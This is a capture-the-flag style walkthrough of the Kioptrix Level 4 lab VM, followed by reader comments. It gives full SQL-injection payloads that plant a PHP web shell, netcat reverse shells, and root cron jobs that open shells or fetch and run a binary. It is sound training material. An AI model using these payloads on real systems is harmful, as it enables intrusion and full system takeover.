Watch video on-line: https://blip.tv/g0tmi1k/kioptrix-level-4-sql-injection-5967372
Download video: http://www.mediafire.com/?sbm8az6gkxdluy7
Brief Overview
Kioptrix is a "boot-to-root" operating system with weaknesses purposely built into it. The user's end goal is to interact with the system using the highest privilege level they can reach. There are other vulnerabilities that can be used to gain access to this box using different techniques, such as breaking out of a limited shell and local file inclusion via PHP session data.
Method
- Scanned network for the target [Netdiscover]
- Port scanned the target [UnicornScan]
- Banner grabbed the services running on the open port(s) [NMap]
- Interacted with the web server & discovered a web application that is possibly subject to a SQL injection vulnerability [Firefox]
- Exploited the SQL injection and enumerated database [SQLMap]
- Uploaded a web shell backdoor [SQLMap & Netcat] (Limited user)
- Manually performed SQL injection to dump the database [Burp Proxy]
- Created a web shell on the target [Burp Proxy & Netcat] (Limited user)
- Created a backdoor shell via a cron job [Burp Proxy & Netcat] (Superuser)
- Accessed the 'flag' [Text file]
- Created a backdoor shell via a cron job [Burp Proxy & Metasploit] (Superuser)
Tools
- Kioptrix4_vmware.rar (MD5: BB4E81EFAAD0E77CD2FCAF02B01A36A3).
- A virtual machine (Example: VMware Player or Virtual Box).
- Netdiscover – (Can be found in BackTrack 5).
- UnicornScan – (Can be found in BackTrack 5's repository).
- NMap – (Can be found in BackTrack 5).
- Firefox – (Can be found in BackTrack 5).
- Tamper Data – (Can be found in BackTrack 5).
- Burp Proxy – (Can be found in BackTrack 5).
- Netcat – (Can be found in BackTrack 5).
- SQLMap – (Can be found in BackTrack 5).
- Msfvenom – (Part of Metasploit & Can be found in BackTrack 5).
Walkthrough
With the target's IP address in hand, the attacker now focuses specifically on the target. The next step is a port scan of every TCP & UDP port. "UnicornScan" shows five open ports: TCP 22 (SSH), TCP 80 (HTTP), TCP 139 (NetBIOS), TCP 445 (SMB) & UDP 137 (NetBIOS). "nmap" verifies the port scan results, and at the same time the attacker takes advantage of nmap's built-in scripting engine, which detects what services are listening on each port, grabs banners (which could identify the software being used & its version) and fingerprints the operating system. Depending on the outcome of the scan, nmap may decide to execute other script(s); in this instance various Samba scripts were run to enumerate it automatically. Nmap fingerprinted the operating system as Linux 2.6.9-2.6.31.
By interacting with the web service using "firefox" the attacker is able to see whether any web application is running. The web server responds and presents a login screen. The attacker fills in a common username, "admin", and uses "'" as the password. The server responds with a MySQL error message saying there was a problem processing the request. This signals a possible MySQL injection vulnerability.
The attacker can automate the database injection procedure by using "SQLMap", which dramatically speeds up the attack. The attacker uses the same URL on which the error was produced, and with the aid of "Tamper Data" they are also able to easily clone the same (POST) data that is sent to the target. (Editor's note: it could have been just as quick to type out the request manually using the page's source code!) The first attempt to exploit the database fails; however, SQLMap states it can try more 'aggressive and complex' injection methods by increasing the level and risk factor, which the attacker does on the second try. This is successful, allowing SQLMap to function fully to the attacker's benefit. The attacker starts by fingerprinting the back-end database and discovers software versions, the operating system, the current database & user, and whether that user is a database administrator. Afterwards the attacker starts to view the content of the databases. This is a common procedure, and SQLMap has an option to automate it, '--dbs'; however, if there is a specific SQL statement the attacker wishes to execute manually, they can use '--sql-shell' to do so. The attacker demonstrates this by viewing the contents of the table "members" (this could also have been automated with '-D members -T members --dump'). (Editor's note: I also wanted to demonstrate SQLMap's output modes: 'minimal' (-v 0), which shows just the outcome of the request, and showing the SQL statements it is currently sending (-v 3), which educates the attacker! SQLMap can also display a lot more detail, such as what SQLMap sees in the server response.)
Besides its ability to give an interactive shell to the database, SQLMap can also attempt to get an interactive shell on the system itself, thus giving the attacker remote access to the target. The attacker tries out this feature and it is successful, allowing them to execute commands on the target. (Editor's note: because the web root folder permissions are set to superuser, and because of how SQLMap works (it uses MySQL to write a small client into the web root folder, which the web server then uses to execute commands/upload files, so two different user accounts are involved; this is covered later), the attacker needs to use the 'same method used for file stager'.) The attacker creates another shell (a fallback, which is useful in case one shell is terminated for whatever reason...) using a reverse netcat shell.
SQLMap has automated a lot of the database injection; however, the attacker wishes to have a little more 'control' by performing the attack manually. The attacker starts "Burp Proxy" and configures it, as Burp makes it easy to alter and repeat requests. Firefox's proxy settings are changed to direct the traffic into Burp. Now when the attacker tries to log in using Firefox, Burp captures the request so they can manipulate it. The attacker alters the password field to write every value in the database into a file located in the web root folder, as this would allow the attacker to read it (even if they didn't have a remote shell). When the attacker uses the shell to view the directory listing, they notice that the file was created by the user "root". The attacker can use this to their advantage later.
The information learnt from the database isn't new to the attacker, as SQLMap had already simplified the procedure, just as it did for creating a web shell to control the target, which the attacker now repeats manually. The attacker uses MySQL to write the backdoor file into the (default) web root folder, which is done as the user 'root', and then uses the web server to execute the code, which runs as the user 'www-data'. As the vulnerable code requests three values (id, password, username), the attacker 'nulls' the values with blank spaces, and instead of making it return every value by using "OR", they use "AND", which is still always true but returns only one row, so the attacker's command is only written once. The attacker also encodes the string to be written into the file as hex, as this isn't interpreted by anything else, which means it won't affect the rest of the code in the vulnerable function.
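The defect all of the above exploits is a login query assembled from raw POST fields. As an added illustration (my code, not the Kioptrix checklogin.php or anything from the original post), here is that pattern beside its parameterised fix, run against an in-memory SQLite table constructed to stand in for the box's "members" table; SQLite replaces MySQL only so the example runs offline, the string-building mistake is identical:

```python
"""
Added example: the checklogin.php-style string-built query (vulnerable) next
to a parameterised version (fixed). SQLite is used as an offline stand-in for
MySQL; the sample rows are constructed, not taken from the real VM.
"""
import sqlite3

# Constructed sample rows standing in for the 'members' table on the box.
MEMBERS = [("john", "MyNameIsJohn"), ("robert", "ADGAdsafdfwt4gadfga==")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (username TEXT, password TEXT)")
    con.executemany("INSERT INTO members VALUES (?, ?)", MEMBERS)
    return con


def login_vulnerable(con, username, password):
    """Mirrors the checklogin.php pattern: user input is spliced into the SQL
    text, so a quote in either field changes the structure of the query."""
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s' "
           "ORDER BY username" % (username, password))
    return [row[0] for row in con.execute(sql).fetchall()]


def login_fixed(con, username, password):
    """Parameterised query: the driver binds the values, so a quote is data,
    never SQL. In production also hash passwords and use a DB account without
    the FILE privilege, so a bug here cannot turn into file writes."""
    sql = ("SELECT username FROM members WHERE username=? AND password=? "
           "ORDER BY username")
    return [row[0] for row in con.execute(sql, (username, password)).fetchall()]


def demo():
    """Runs the probe and the bypass from the walkthrough against both versions."""
    con = make_db()
    # The probe the walkthrough starts with: a lone quote as the password.
    try:
        login_vulnerable(con, "admin", "'")
        probe_error = None
    except sqlite3.OperationalError as exc:
        probe_error = str(exc)   # the syntax error that revealed the injection
    bypass = "' OR 1=1 -- "      # same tautology used in the Burp repeater step
    return {
        "probe_error": probe_error,
        "vuln_bypass": login_vulnerable(con, "admin", bypass),  # every member
        "fixed_bypass": login_fixed(con, "admin", bypass),      # nobody
        "fixed_valid": login_fixed(con, "john", "MyNameIsJohn"),
    }


if __name__ == "__main__":
    print(demo())
```

The root-level outcome later in the walkthrough additionally relies on the database account holding the FILE privilege and on the files landing as root; restricting both (MySQL's secure_file_priv and a dedicated unprivileged service account) limits what even a successful injection can write.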
The attacker now tries something that wasn't automated by SQLMap: knowing that MySQL is running as root, they write a file into the "cron.d" directory, which is used for scheduling. At set intervals the commands specified in each 'job' are executed as the specified user. The attacker crafts an 'evil' job designed to create a reverse shell, to be executed as the superuser every minute. The attacker sets up a listener to catch the connection from the target and then waits (up to) a minute for the scheduled cron job to run.... (Editor's note: the attacker is able to go from "nothing to root" in two commands! One SQLi request and then setting up netcat to listen.)
...It wasn't long before the attacker was presented with a shell which has superuser privileges.
Game over
When they explore root's home folder, they notice a text file called "congrats.txt". On opening it, the attacker is notified that they have reached the end goal.
The attacker then repeats the cron job method, this time delivering a Metasploit payload. The job is written to do the following:
- Automatically delete the cron job (so it is only executed once).
- Move into a folder that can be written to and executed from.
- Download the binary file from the attacker.
- Give it execute permissions.
- Execute the binary file.
- Delete the binary file.
The attacker sets up another listener, starts the web server with the binary file in the web root folder and waits for the target to connect...
Game over...again
Commands
netdiscover -r 192.168.0.1/24
us -mT -Iv 192.168.0.4:a -r 3000 -R 3 && us -mU -Iv 192.168.0.4:a -r 3000 -R 3
nmap -p 1-65535 -T4 -A -v 192.168.0.4 # -p 22,80,139,445
BT -> firefox -> 192.168.0.4 -> admin:123
// Firefox -> 192.168.0.4 -> admin:'
cd /pentest/database/sqlmap
// Firefox -> Tools -> Addons -> Enable Tamper Data -> Restart firefox
// Firefox -> Tools -> Tamper Data
// Firefox -> 192.168.0.4 -> admin:123
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword # y/n
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --level=5 --risk=5 # n/n
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 --fingerprint --banner --current-db --current-user --is-dba
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 3 --dbs
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 -D members --tables
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 -D members -T members --columns --count
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 -D members -T members --dump
# john:MyNameIsJohn
# robert:ADGAdsafdfwt4gadfga==
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 --users --passwords
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read="/etc/passwd"
#cat /pentest/database/sqlmap/output/192.168.0.4/files/_etc_passwd
#find / -name apache2.conf
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read=/etc/apache2/apache2.conf
#tail /pentest/database/sqlmap/output/192.168.0.4/files/_etc_apache2_apache2.conf
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read=/etc/apache2/sites-enabled/000-default
#grep -i "DocumentRoot" /pentest/database/sqlmap/output/192.168.0.4/files/_etc_apache2_sites-enabled_000-default
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read="/var/www/index.php"
#cat /pentest/database/sqlmap/output/192.168.0.4/files/_var_www_index.php
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read="/var/www/checklogin.php"
#cat /pentest/database/sqlmap/output/192.168.0.4/files/_var_www_checklogin.php
#cat /pentest/database/sqlmap/output/192.168.0.4/files/_var_www_checklogin.php | grep -i pass -A 1 -B 1
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -v 0 --sql-shell -> select * from members -> q # a/n/a
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -v 0 --os-shell # n, 3, /var/www/, *none*, y
id # a <-- All
whereis nc
ifconfig
nc -lvvp 443
/bin/nc.traditional 192.168.0.192 443 -e /bin/sh
id
ls
pwd
#cd /pentest/backdoors/web/weevely
#python weevely.py
#python weevely.py generate g0tmi1k /tmp/output.php
#firefox -> 192.168.0.4/*randomstring*.php # FAILS
#cd -
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -v 0 --file-write=/tmp/output.php --file-dest=/var/www/output.php
#python weevely.py http://192.168.0.4/output.php g0tmi1k :system.info auto
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -v 0 --os-pwn # n, 1, 3, /var/www/, *none*, y, 1, *ourIP*, *port*, 1, 1
BT -> BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Proxies -> burpsuite # java -jar /pentest/web/burpsuite/burpsuite_v1.4.01.jar
// Firefox -> Edit -> Preferences -> Advanced -> Network -> Settings -> Manual proxy configuration -> 127.0.0.1:8080
// Burp -> Proxy -> Intercept -> Off. Proxy -> Options -> Port: 8080.
BT -> firefox -> 192.168.0.4 -> admin:'
// Burp -> target -> site map -> http://192.168.0.4 -> checklogin.php -> Right click: myusername=admin&mypassword=%27 -> Send to repeater
// Burp -> repeater -> 2 -> raw: myusername=admin&mypassword=' OR 1=1 INTO OUTFILE '/var/www/dump' -- &Submit=Login -> go
curl 192.168.0.4/dump
ls -lah # ROOT ONLY! =)
// Burp -> decoder -> <?php passthru($_GET['cmd']); ?> -> encode: ascii hex
// Burp -> repeater -> 2 -> raw: myusername=admin&mypassword=' AND 1=1 union select 0x20,0x20,0x20 INTO OUTFILE '/var/www/backdoor.php' LINES TERMINATED BY 0x3c3f70687020706173737468727528245f4745545b27636d64275d293b203f3e -- &Submit=Login -> go
// Burp -> decoder -> * * * * * root /bin/nc.traditional 192.168.0.192 444 -e /bin/sh -> encode: ascii hex # Don't forget the new line at the end!
// Burp -> repeater -> 2 -> raw: myusername=admin&mypassword=' AND 1=1 union select 0x20,0x20,0x20 INTO OUTFILE '/etc/cron.d/backdoor' LINES TERMINATED BY 0x2a202a202a202a202a20726f6f74202f62696e2f6e632e747261646974696f6e616c203139322e3136382e302e31303220343434202d65202f62696e2f73680a -- &Submit=Login -> go
nc -lvvp 444
date
*wait up to 1 minute*
id
cd /root
ls -lah
cat congrats.txt
cd /tmp
msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=446 X > back.door
file back.door
ls -lh back.door
python -m SimpleHTTPServer &
msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 E
// Burp -> decoder -> * * * * * root rm /etc/cron.d/exploit; cd /tmp && wget 192.168.0.192:8000/back.door && chmod +x back.door && ./back.door; rm /tmp/back.door -> encode: ascii hex # Don't forget the new line at the end!
// Burp -> repeater -> 2 -> raw: myusername=admin&mypassword=' AND 1=1 union select 0x20,0x20,0x20 INTO OUTFILE '/etc/cron.d/exploit' LINES TERMINATED BY 0x2a202a202a202a202a20726f6f7420726d202f6574632f63726f6e2e642f6578706c6f69743b206364202f746d703b2077676574203139322e3136382e302e3139323a383030302f6261636b2e646f6f722026262063686d6f64202b78206261636b2e646f6f72202626202e2f6261636b2e646f6f723b20726d206261636b2e646f6f720a -- &Submit=Login -> go
date
*wait up to 1 minute*
id
Notes
- You need to create a new virtual machine and attach an existing hard drive (kioptrix 4!).
- The target uses DHCP to obtain an IP address.
Video length: 11:31
Capture length: 36:49
Blog Post: http://g0tmi1k.blogspot.com/2012/02/video-kioptrix-level-4-sql-injection.html
Forum Post: *coming soon*
~g0tmi1k
Is there a way for a successful SQL Injection with OS ownage if mysql does not have write permissions? I've been trying to find a folder in the Document Root, but it looks like mysql was not given permission to write there. Is there a way to overcome this?
I was really impressed with your local privilege escalation method in this video. I did things completely different from you. I know some of this is shown in your other videos, but I got root like this:
1) SQLi Login page
2) Dirbuster to discover usernames (Forgot for LFI)
3) Modify requests with burp to get user credentials
4) SSH with new creds, break out of lshell with echo os.system
5) Find services running as root
6) Enumerate needed information using MySQL load_file
7) MySQL sys_exec to get root shell
Anyway, I really enjoy your write ups. After finishing a new boot to root, I always check your blog to compare our methods. I typically find your solutions to be more elegant though. I always learn quite a bit from you, keep up the great work!
How did you learn to use the Burp suite so well?
Yes this was another gem I learned a thing or two from! Thanks for making it. I also did like Chris Spehn, but at his step 3, enter the login with the valid username (from step 2) and a typical sqli entry in the password field. That sqli prints the username and password on the next page, which is the admin panel for that admin. SSH in and use sys_exec to escalate the privs of the user I ssh'd in with.
Hi g0tm1lk, your videos are amazing! You are awesome :)
I have a strange problem with kioptrix4. If I run sqlmap it doesn't recognize the dbms...
[11:59:47] [INFO] testing MySQL
[11:59:47] [PAYLOAD] -7246
[11:59:48] [WARNING] the back-end DBMS is not MySQL
sqlmap found the vulnerability, but I don't use the payload.
I updated sqlmap with the --update command, but it didn't help me.
Do you have any idea what is the problem ?
This is the command :
python /pentest/database/sqlmap/sqlmap.py -u http://192.168.75.13/checklogin.php --data="POSTDATA=myusername=admin&mypassword=pass&Submit=Login" -p mypassword --level=5 --risk=5 -v 3
and here the payload :
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: POSTDATA=myusername=admin&mypassword=-5329' OR (3177=3177) AND 'FKSv'='FKSv&Submit=Login
Vector: OR ([INFERENCE])
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: POSTDATA=myusername=admin&mypassword=pass' AND 6432=BENCHMARK(5000000,MD5(0x5870705a)) AND 'xHZi'='xHZi&Submit=Login
Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
Please help me :)